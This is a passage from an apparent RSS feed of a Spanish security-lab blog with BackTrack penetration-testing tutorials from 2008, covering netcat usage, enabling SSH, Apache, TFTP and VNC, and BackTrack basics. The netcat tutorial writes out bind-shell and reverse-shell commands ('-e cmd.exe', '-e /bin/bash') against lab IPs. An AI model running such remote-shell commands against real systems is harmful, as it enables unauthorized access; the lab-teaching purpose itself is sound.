		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=312</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Netcat (a menudo referida como la navaja multiusos de los hackers) es una herramienta de red bajo licencia GPL (en la versión de GNU) disponible para sistemas UNIX, Microsoft y Apple que permite a través de intérprete de comandos y con una sintaxis muy sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos).</p>
<p style="text-align: justify;"><span id="more-312"></span>Sus capacidades hacen que sea a menudo usada como una herramienta para abrir puertas traseras una vez invadido un sistema y obtenido privilegios de administrador o root del equipo. También resulta extremadamente útil a efectos de depuración para aplicaciones de red.</p>
<p style="text-align: justify;">Ya en desuso, originariamente se trataba de una potentísima herramienta de red para administradores no habiéndose descubierto hasta la fecha el total de los comandos que se utilizaban, los cuales permanecen secretos por las particularidades de esta herramienta. (<a href="http://netcat.sourceforge.net/" target="_blank"><strong>Más información &#8211; Web Oficial</strong></a>)</p>
<p style="text-align: justify;">En muchas ocasiones y por diferentes razones se hace necesario realizar conexiones a puertos TCP y UDP.</p>
<p style="text-align: justify;">Algunas de estas razones pueden ser:</p>
<ul style="text-align: justify;">
<li>Cuando necesitamos comprobar la disponibilidad de un puerto (si este se encuentra abierto o cerrado).</li>
<li>Cuando queremos leer el banner de dicho puerto (servicio gestionado por el mismo).</li>
<li>Cuando necesitamos conectarnos a un servicio de red de manera manual.</li>
</ul>
<p style="text-align: justify;">El modo de uso de netcat ya ha sido tratado de manera superficial en algunos laboratorios. Trataremos entonces de profundizar un poco más en este laboratorio sobre las posibilidades de la herramienta, aunque tampoco será la &#8220;Guía definitiva de Netcat&#8221;, si nos acercará un poco más a la misma.</p>
<p style="text-align: justify;">Algunas de las publicaciones donde he hecho referencia sobre netcat son las siguientes:</p>
<p style="text-align: justify;"><a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i" target="_blank"><strong>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Identificación de Banner’s (Banderas) I</strong></a><br />
<a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii" target="_blank"><strong>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Scanning II</strong></a><br />
<a href="http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-ii-de-viii" target="_blank"><strong>Solución del HackTaller 01 DragonJAR (II de VIII)</strong></a><br />
<a href="http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-iii-de-viii" target="_blank"><strong>Solución del HackTaller 01 DragonJAR (III de VIII)</strong></a></p>
<p style="text-align: justify;"><strong>Ayudas y Opciones de Comandos</strong></p>
<p style="text-align: justify;"><strong>Nota:</strong> Netcat es una herramienta que viene incluída y lista para ser usada desde la distribución Linux BackTrack, la cual es el objeto de estudio de esta serie de prácticas.</p>
<p style="text-align: justify;">Uno de los primero acercamientos a netcat que debe realizar cada investigador es la exploración del propio sistema de ayudas y opciones de comandos que incluye la herramienta. Para ello bastará con ejecutar la siguiente sintaxis desde la línea de comandos:</p>
<p style="text-align: justify;"><strong>nc -h</strong></p>
<p style="text-align: justify;">Para lo cual obtendremos el siguiente resultado:</p>
<p style="text-align: justify;"><strong>nc -h<br />
[v1.10]<br />
connect to somewhere: nc [-options] hostname port[s] [ports] &#8230;<br />
listen for inbound: nc -l -p port [-options] [hostname] [port]<br />
options:<br />
-e prog program to exec after connect [dangerous!!]<br />
-g gateway source-routing hop point[s], up to 8<br />
-G num source-routing pointer: 4, 8, 12, &#8230;<br />
-h this cruft<br />
-i secs delay interval for lines sent, ports scanned<br />
-l listen mode, for inbound connects<br />
-n numeric-only IP addresses, no DNS<br />
-o file hex dump of traffic<br />
-p port local port number<br />
-r randomize local and remote ports<br />
-s addr local source address<br />
-t answer TELNET negotiation<br />
-u UDP mode<br />
-v verbose [use twice to be more verbose]<br />
-w secs timeout for connects and final net reads<br />
-z zero-I/O mode [used for scanning]<br />
port numbers can be individual or ranges: lo-hi [inclusive]</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img511.imageshack.us/img511/996/netcat1px6.jpg" alt="" width="450" height="540" /></p>
<p style="text-align: justify;"><strong>Identificación de Banners e información</strong></p>
<p style="text-align: justify;">Para intentar una conexión y obtener información de un sistema y puerto específico la sintaxis es la siguiente:</p>
<p style="text-align: justify;"><strong>nc -vv IP/HostName Puerto</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img300.imageshack.us/img300/6339/netcat2by4.jpg" alt="" width="450" height="346" /></p>
<p style="text-align: justify;">Una vez visualizada la información requerida procedemos a detener la ejecución con la combinación de teclas Ctrl + C.</p>
<p style="text-align: justify;"><strong>Consultando el Servidor Web que gestiona un sistema Objetivo</strong></p>
<p style="text-align: justify;">Se trata de realizar una conexión al puerto comunmente utilizado para servir páginas Web (80), luego se envía una petición HTTP / HEAD para obtener y leer el banner del servidor HTTP. Para ello ejecutaremos la siguiente sintaxis:</p>
<p style="text-align: justify;"><strong>nc -vv IP/HostName Puerto</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img504.imageshack.us/img504/9316/netcat3bm2.jpg" alt="" width="450" height="366" /></p>
<p style="text-align: justify;"><strong>Netcat a la escucha sobre puertos TCP/UDP y Chat<br />
</strong></p>
<p style="text-align: justify;">Establecer a Netcat en modo &#8220;listen&#8221; (escucha) en un puerto TCP / UDP es una de las tareas más implementadas con la herramienta, pues permite depurar clientes y/o aplicaciones de red, envío/recepción de datos, ejecución de terminales, etc.</p>
<p style="text-align: justify;">Vamos como establecer a Netcat en modo &#8220;listen&#8221; (escucha) y como podemos implementar sobre el mismo un pequeño pero útil sistema de Chat entre dos equipos.</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img504.imageshack.us/img504/9841/netcat4dt9.jpg" alt="" width="450" height="447" /></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img509.imageshack.us/img509/3803/netcat5vm4.jpg" alt="" width="450" height="414" /></p>
<p style="text-align: justify;">La máquina con Linux BackTrack será el sistema donde se establezca Netcat en modo &#8220;listen&#8221;, veamos:</p>
<p style="text-align: justify;"><strong>nc -lvv 12345</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img354.imageshack.us/img354/7607/netcat6kb3.jpg" alt="" width="356" height="318" /></p>
<p style="text-align: justify;">El cliente será el sistema Windows</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img361.imageshack.us/img361/9703/netcat7tx4.jpg" alt="" width="450" height="409" /></p>
<p style="text-align: justify;"><strong>Transferencia de Archivos con Netcat</strong></p>
<p style="text-align: justify;">Otra de las bondades que permite realizar Netcat es la posibilidad de habilitar una conexión para transferir archivos entre dos equipos. Esto permitirá entonces enviar/recibir archivos de texto y/o binarios entre ellos.</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: justify;">Debemos ejecutar la siguiente sintaxis:</p>
<p style="text-align: justify;"><strong>nc -lvp 12345 &gt; salida.txt</strong></p>
<p style="text-align: justify;">El equipo server (Linux BackTrack) estará habilitado en modo listen (escucha) y redireccionando los datos recibidos a un archivo de salida, veamos:</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img146.imageshack.us/img146/6551/netcat8ob1.jpg" alt="" width="395" height="321" /></p>
<p style="text-align: justify;">El equipo cliente (Windows) establecerá la conexión con BackTrack (al puerto 12345) y enviará el archivo.<br />
para ello primero crearemos el archivo de texto a enviar. Veamos:</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img504.imageshack.us/img504/8930/netcat9do1.jpg" alt="" width="463" height="239" /></p>
<p style="text-align: justify;">Así se vería desde el servidor BackTrack cuando recibe los datos</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img378.imageshack.us/img378/5779/netcat10os7.jpg" alt="" width="408" height="269" /></p>
<p style="text-align: justify;">Luego procedemos a comprobar la información contenida en el envío</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img136.imageshack.us/img136/9493/netcat11np8.jpg" alt="" width="415" height="292" /></p>
<p style="text-align: justify;"><strong>Administración Remota con Netcat (Shell)<br />
</strong></p>
<p style="text-align: justify;">Sin lugar a dudas esta es una de las mejores utilidades que se le pueda dar a Netcat, pues como hemos visto esta grandiosa herramienta permite redireccionar instrucciones y comandos. Esto significa que podemos tomar por ejemplo un archivo .exe y redirigir la entrada/salida y mensajes de error a los puertos TCP/UDP que establezcamos.</p>
<p style="text-align: justify;">Veamos en la práctica como podemos redirigir el ejecutable CMD.EXE a un cliente de red en un puerto local. De esta manera ofreceremos una línea de comandos a cualquier usuario que establezca una conexión a nuestro equipo y puerto establecido.</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: justify;">Windows hará el papel de servidor, quién ofrecerá una línea de comandos a los clientes que establezcan una conexión con él.</p>
<p style="text-align: justify;"><strong>nc -lvp 12345 -e cmd.exe</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img243.imageshack.us/img243/2668/netcat12iu5.jpg" alt="" width="405" height="257" /></p>
<p style="text-align: justify;">Ahora desde BackTrack, quién actua como cliente, establecerá una conexión con Windows. Veamos:</p>
<p style="text-align: justify;"><strong>nc -v 10.30.3.116 12345</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img151.imageshack.us/img151/7813/netcat13my1.jpg" alt="" width="413" height="373" /></p>
<p style="text-align: justify;"><strong>Shell Inversa con Netcat</strong></p>
<p style="text-align: justify;">A diferencia del escenario anterior y como en muchas ocasiones sucede, no se puede controlar y administrar las salidas/entradas o disposición de puertos. Para ello Netcat nos ofrece otra solución más en su repertorio. Se trata entonces de establacer a Netcat en modo &#8220;listen&#8221; y el posterior envío/recepción de comandos, entre ellos la ejecución de una terminal. Veamos:</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: justify;">En este caso el sistema Windows pretende obtener una shell del sistema Linux BackTrack, con la limitante de que BackTrack no puede en ese momento servir una shell en modo &#8220;Listen&#8221;.</p>
<p style="text-align: justify;">Desde Windows se establece el modo Listen:</p>
<p style="text-align: justify;"><strong>nc -lvp 12345</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img262.imageshack.us/img262/6366/netcat14wp3.jpg" alt="" width="343" height="255" /></p>
<p style="text-align: justify;">Ahora desde Backtrack se establece la conexión hacia Windows y la instrucción que este deberá servir al mismo:</p>
<p style="text-align: justify;"><strong>nc -v 10.30.3.116 12345 -e /bin/bash</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img300.imageshack.us/img300/3433/netcat15fu3.jpg" alt="" width="411" height="367" /></p>
<p style="text-align: justify;">Enviemos una instrucción (comando) desde Windows para que el resultado pueda ser visualizado desde el mismo.</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img146.imageshack.us/img146/1160/netcat17ja3.jpg" alt="" width="450" height="321" /></p>
<p style="text-align: justify;">Estos son solo algunos de los muchos usos que se le pueden dar a Netcat, por ello es que se le conoce como la navaja suiza de las redes <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> .</p>
<p style="text-align: justify;">A partir de este momento queda abierto el espacio para que los interesados profundicen en el uso de la herramienta.</p>
<p style="text-align: justify;">Recomiento la lectura de estas páginas web, donde se detallan algunos usos e información de la herramienta:</p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Netcat" target="_blank"><strong>Crysol<br />
Netcat en la Wikipedia</strong></a><br />
<a href="http://netcat.sourceforge.net/" target="_blank"><strong>Web Oficial de Netcat</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Test de penetración con BackTrack, servicios básicos</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos#comments</comments>
		<pubDate>Thu, 28 Aug 2008 16:14:25 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Servicios]]></category>
		<category><![CDATA[SSH]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[TFTP]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[VNC]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=226</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">BackTrack incluye algunos servicios de red por defecto, entre ellos HTTPD, SSHD, TFTP, VNC SERVER, etc. Estos servicios pueden ser utilizados en diferentes situaciones en un Test de Penetración (conexión remota a un equipo, transferencia de archivos, etc).</p>
<p style="text-align: justify;"><strong>Objetivos del laboratorio:</strong></p>
<ol style="text-align: justify;">
<li>Familiarizarse con la suite de herramientas incluídas en BackTrack.</li>
<li>Cambiar la contrseña que viene por defecto en BackTrack.</li>
<li>Conocer los direferentes servicios disponibles en BackTrack (básicos).</li>
<li>Configurar y poner en marcha los servicios básicos de BackTrack.</li>
<li>Comprobar la disponibilidad de los servicios básicos de BackTrack.</li>
<li>Realizar pruebas de conexión a los servicios de BackTrack.</li>
</ol>
<p style="text-align: justify;"><span id="more-226"></span>Veamos como iniciar con backtrack</p>
<p style="text-align: justify;">Sistema de <a href="http://es.wikipedia.org/wiki/Booteo" target="_blank"><strong>booteo</strong></a> de BackTrack</p>
<p style="text-align: justify;"><a href="http://img125.imageshack.us/img125/1193/10lu0.jpg" target="_blank"><img src="http://img125.imageshack.us/img125/1193/10lu0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>Termina de reconocer y configurar algunos de los dispositivos físicos, luego de cargar estos dispositivos nos ofrece una pantalla de bienvenida, con información de configuración, además de una pantalla de <a href="http://es.wikipedia.org/wiki/Login" target="_blank"><strong>login</strong></a>. La pantalla nos invita a configurar nuestro sistema con algunos comandos, después de logearnos como root.</p>
<p style="text-align: justify;"><a href="http://img223.imageshack.us/img223/7536/11od8.jpg" target="_blank"><img src="http://img223.imageshack.us/img223/7536/11od8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>Para logearnos en el sistema ingresamos:<br />
usuario: <strong>root</strong><br />
contraseña: <strong>toor</strong></p>
<p style="text-align: justify;"><a href="http://img204.imageshack.us/img204/2664/12oo4.jpg" target="_blank"><img src="http://img204.imageshack.us/img204/2664/12oo4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Si desde el comienzo seleccionamos la opción de acceso a la red mediante NAT (VMWare), podemos observar gracias al comando <a href="http://es.wikipedia.org/wiki/Ifconfig" target="_blank"><strong>ifconfig</strong></a> nuestras interfaces de red.</p>
<p style="text-align: justify;"><a href="http://img106.imageshack.us/img106/7615/13ab6.jpg" target="_blank"><img src="http://img106.imageshack.us/img106/7615/13ab6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Luego podemos configurar el entorno gráfico (xconf) y cargarlo mediante el comando <a href="http://es.tldp.org/FAQ/FAQ_Linux/Html/FAQ_Linux-6.html" target="_blank"><strong>startx<br />
</strong></a> ó Flux (según nuestras preferencias de uso)</p>
<p style="text-align: justify;"><a href="http://img130.imageshack.us/img130/4568/14jg6.jpg" target="_blank"><img src="http://img130.imageshack.us/img130/4568/14jg6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>Entorno gráfico cargando.</p>
<p style="text-align: justify;"><a href="http://img230.imageshack.us/img230/7319/15bw9.jpg" target="_blank"><img src="http://img230.imageshack.us/img230/7319/15bw9.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>BackTrack cargado como Live CD en su totalidad.</p>
<p style="text-align: justify;"><a href="http://img124.imageshack.us/img124/4858/31hm3.jpg" target="_blank"><img src="http://img124.imageshack.us/img124/4858/31hm3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Es importante destacar que el éxito de BackTrack reside en la excelente organización y disposición por grupos de herramientas:</p>
<ol style="text-align: justify;">
<li>Recolección de información</li>
<li>Mapeo de red</li>
<li>Identificación de vulnerabilidades</li>
<li>Penetración / Explotación</li>
<li>Escalada de privilegios</li>
<li>Mantenimiento del acceso</li>
<li>Servicios de red inalámbrica</li>
<li>Telefonía sobre VoIP</li>
<li>Informática Forense</li>
<li>Ingeniería inversa</li>
</ol>
<p style="text-align: justify;">También  podemos ingresar a los diferentes grupos de herramientas desde la línea de comandos:</p>
<p style="text-align: justify;"><strong>cd /pentest/</strong></p>
<p style="text-align: justify;"><a href="http://img172.imageshack.us/img172/9676/75183728mt7.jpg"><img src="http://img172.imageshack.us/img172/9676/75183728mt7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Uno de los primero pasos a realizar debe ser el cambio de contraseña que viene por defecto en backtrack, para ello bastará con ejecutar la siguiente instrucción en la línea de comandos:</p>
<p style="text-align: justify;"><strong>passwd</strong></p>
<p style="text-align: justify;">y seguir las instrucciones para completar el cambio</p>
<p><a href="http://img165.imageshack.us/img165/9905/52389028kw9.jpg"><img src="http://img165.imageshack.us/img165/9905/52389028kw9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Veremos ahora como identificar y habilitar servicios básicos en backtrack</p>
<p style="text-align: justify;"><strong>SSH (Secure Shell)</strong></p>
<p style="text-align: justify;">Empecemos por generar y habilitar el servicio de conexiones seguras (SSHD &#8211; Secure Shell Daemon), para ello y desde la línea de comandos ejecutamos la siguiente sintáxis</p>
<p style="text-align: justify;"><strong>sshd-generate</strong></p>
<p><a href="http://img381.imageshack.us/img381/7827/80769068hf2.jpg"><img src="http://img381.imageshack.us/img381/7827/80769068hf2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Una vez generado nuestro servicio, iniciaremos el mismo como conexión segura:</p>
<p style="text-align: justify;"><strong>/usr/sbin/sshd</strong></p>
<p><a href="http://img136.imageshack.us/img136/6959/20870314mr8.jpg"><img src="http://img136.imageshack.us/img136/6959/20870314mr8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora, si deseamos comprobar la disponibilidad del servicio de conexiones seguras, basta con ejecutar el siguiente comando para mostrar las conexiones activas y a la escucha en nuestra máquina (para este caso solo consultamos para el puerto 22, puerto usado generalmente para este tipo de conexiones):</p>
<p style="text-align: justify;"><strong>netstat -ant|grep 22</strong></p>
<p><a href="http://img514.imageshack.us/img514/6458/99595389wj2.jpg"><img src="http://img514.imageshack.us/img514/6458/99595389wj2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Podemos hacer una prueba de conexión desde otro sistema, veamos:</p>
<p><a href="http://img257.imageshack.us/img257/2950/38574624hz7.jpg"><img src="http://img257.imageshack.us/img257/2950/38574624hz7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><strong>&#8212; Servidor Apache &#8212;<br />
</strong></p>
<p style="text-align: justify;">BackTrack incluye por defecto una instalación del servidor Web Apache, veamos como ponerlo en marcha.</p>
<p style="text-align: justify;"><strong>Nota:</strong> Cabe aclarar que la mayoría de estos servicios pueden ser ejecutados desde el menu incluído en K-Menú, Servicios. Solo estamos viendo otros métodos en caso de que lo queremos hacer o bien sea, más rápido, ó cuando no tengamos disponible el entorno gráfico.</p>
<p style="text-align: justify;">Pongamos en marcha el servicio de apache desde la línea de comandos:</p>
<p style="text-align: justify;"><strong>apachectl start</strong></p>
<p style="text-align: justify;">Y comprobemos la disponiblidad del servicio</p>
<p style="text-align: justify;"><strong>netstat -ant|grep 80</strong></p>
<p><a href="http://img165.imageshack.us/img165/148/99192940en1.jpg"><img src="http://img165.imageshack.us/img165/148/99192940en1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora desde un navegador Web</p>
<p><a href="http://img413.imageshack.us/img413/3131/52594955jp8.jpg"><img src="http://img413.imageshack.us/img413/3131/52594955jp8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Para detener el servicio solo basta ejecutar la instrucción stop.</p>
<p style="text-align: justify;"><strong>apachectl stop</strong></p>
<p><a href="http://img98.imageshack.us/img98/2964/85170941ku3.jpg"><img src="http://img98.imageshack.us/img98/2964/85170941ku3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><strong>&#8212; TFTP (Trivial File Transfer Protocol &#8211; Protocolo de transferencia de archivos trivial) &#8212;<br />
</strong></p>
<p style="text-align: justify;">Veamos como poner en marcha el servidor TFTP que incluye por defecto el S.O BackTrack.</p>
<p style="text-align: justify;">Desde la línea de comandos ejecutamos la siguiente instrucción:</p>
<p style="text-align: justify;"><strong>atftpd &#8211;daemon &#8211;port 69 /tap/</strong></p>
<p><a href="http://img222.imageshack.us/img222/2558/10pt0.jpg"><img src="http://img222.imageshack.us/img222/2558/10pt0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora comprobemos la disponiblidad del servicio</p>
<p style="text-align: justify;"><strong>netstat -anu|grep 69</strong></p>
<p><a href="http://img257.imageshack.us/img257/8765/11fd3.jpg"><img src="http://img257.imageshack.us/img257/8765/11fd3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Hagamos una prueba de transferencia de archivos</p>
<p><a href="http://img54.imageshack.us/img54/6685/14ih6.jpg"><img src="http://img54.imageshack.us/img54/6685/14ih6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><strong>&#8212; VNC &#8212;<br />
</strong></p>
<p style="text-align: justify;">Veamos como configurar y poner en marcha nuestro propio servicio de VNC en BackTrack, para ello ejecutamos la siguiente instrucción:</p>
<p style="text-align: justify;"><strong>vncserver</strong></p>
<p style="text-align: justify;">Solo tenemos que seguir las intrucciones en pantalla (definir contraseña de acceso)</p>
<p><a href="http://img165.imageshack.us/img165/2155/12eo7.jpg"><img src="http://img165.imageshack.us/img165/2155/12eo7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Verifiquemos que nuestra máquina realmente está a la escucha de nuevas conexiones, para ello ejecutamos la siguiente instrucción:</p>
<p style="text-align: justify;"><strong>netstat -ant|grep 590</strong></p>
<p><a href="http://img98.imageshack.us/img98/1725/13km7.jpg"><img src="http://img98.imageshack.us/img98/1725/13km7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora hagamos una prueba de conexión desde otra máquina</p>
<p><a href="http://img237.imageshack.us/img237/9662/vnc1wq0.jpg"><img src="http://img237.imageshack.us/img237/9662/vnc1wq0.th.jpg" alt="" /></a></p>
<p><a href="http://img185.imageshack.us/img185/9515/vnc2cq1.jpg"><img src="http://img185.imageshack.us/img185/9515/vnc2cq1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Aquí termina el laboratorio sobre habilitación, configuración y prueba de servicios básicos en BackTrack. Estos mismo servicios pueden ser habilitados de manera gráfica en el propio menú K de BackTrack, además pueden ser encontrados algunos otros instalados por defecto en el sistema, esta será la práctica para cada uno de los seguidores de los laboratorios, espero que sean enviadas las capturas de pantallas, además de los comentarios sobre el mismo.</p>
<p style="text-align: justify;">
<p style="text-align: justify;">
<p style="text-align: justify;"><strong>Palabras clave:</strong><a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank"><br />
Apache</a>, <a href="http://es.wikipedia.org/wiki/VNC" target="_blank">VNC</a>, <a href="http://es.wikipedia.org/wiki/TFTP" target="_blank">TFTP</a>, <a href="http://es.wikipedia.org/wiki/SSH" target="_blank">SSH</a>, <a href="http://www.kriptopolis.org/backtrack" target="_blank">BackTrack</a>, <a href="http://es.wikipedia.org/wiki/Arranque" target="_blank">Booteo</a>, <a href="http://es.wikipedia.org/wiki/NAT" target="_blank">NAT</a>, <a href="http://es.wikipedia.org/wiki/VMware" target="_blank">VMWare</a></p>
<p style="text-align: justify;"><strong>Nota:</strong><br />
Este nuevo recurso está basado en el sistema de entrenamiento ofrecido por los desarrolladores y colaboradores del proyecto BackTrack (Remote-Exploit) <a href="http://www.offensive-security.com/" target="_blank">Offensive-security.com</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Test de penetración con BackTrack, Conceptos básicos</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos#comments</comments>
		<pubDate>Mon, 25 Aug 2008 18:22:40 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[LiveCD]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=215</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong>BackTrack</strong><br />
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.<br />
Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.<br />
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.</p>
<p style="text-align: justify;"><span id="more-215"></span>Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.<br />
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org<br />
<a href="http://www.remote-exploit.org/backtrack.html" target="_blank"><strong>Web Oficial de BackTrack</strong></a></p>
<p style="text-align: justify;"><a href="http://backtrack.offensive-security.com/index.php?title=Tools" target="_blank"><strong>Lista de herramientas incluídas en BackTrack</strong></a></p>
<p style="text-align: justify;">El proceso de instalación o puesta en marcha de este LiveCD es un tema que ya ha sido cubierto en diferentes ocasiones en Labs DragonJAR. Veamos algunos enlaces de como llevar a cabo este procedimiento:</p>
<p style="text-align: justify;"><a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-maquinas-virtuales-i" target="_blank"><strong>Ejecución / Instalación de BackTrack</strong></a></p>
<p style="text-align: justify;"><a href="http://www.dragonjar.org/backtrack-portable.xhtml" target="_blank"><strong>BackTrack Portable</strong></a></p>
<p style="text-align: justify;"><a href="http://hwagm.elhacker.net/htm/backtrack.htm" target="_blank"><strong>Instalar Back | Track en el HD de tú PC</strong></a></p>
<p style="text-align: justify;"><a href="http://www.kriptopolis.org/backtrack-usb" target="_blank"><strong>Instalar BackTrack en una llave USB</strong></a></p>
<p style="text-align: justify;"><a href="http://www.kriptopolis.org/backtrack" target="_blank"><strong>Review BackTrack</strong></a></p>
<p style="text-align: justify;"><a href="http://kernelpanic.org.mx/2008/07/como-instalar-backtrack-3/" target="_blank"><strong>Como Instalar Back|Track 3</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Test de penetración con BackTrack, Contenido y Recursos</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-contenido-y-recursos</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-contenido-y-recursos#comments</comments>
		<pubDate>Mon, 25 Aug 2008 15:59:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[ARP]]></category>
		<category><![CDATA[fuzzing]]></category>
		<category><![CDATA[LiveCD]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Redirección]]></category>
		<category><![CDATA[spoofing]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[Troyanos]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=211</guid>
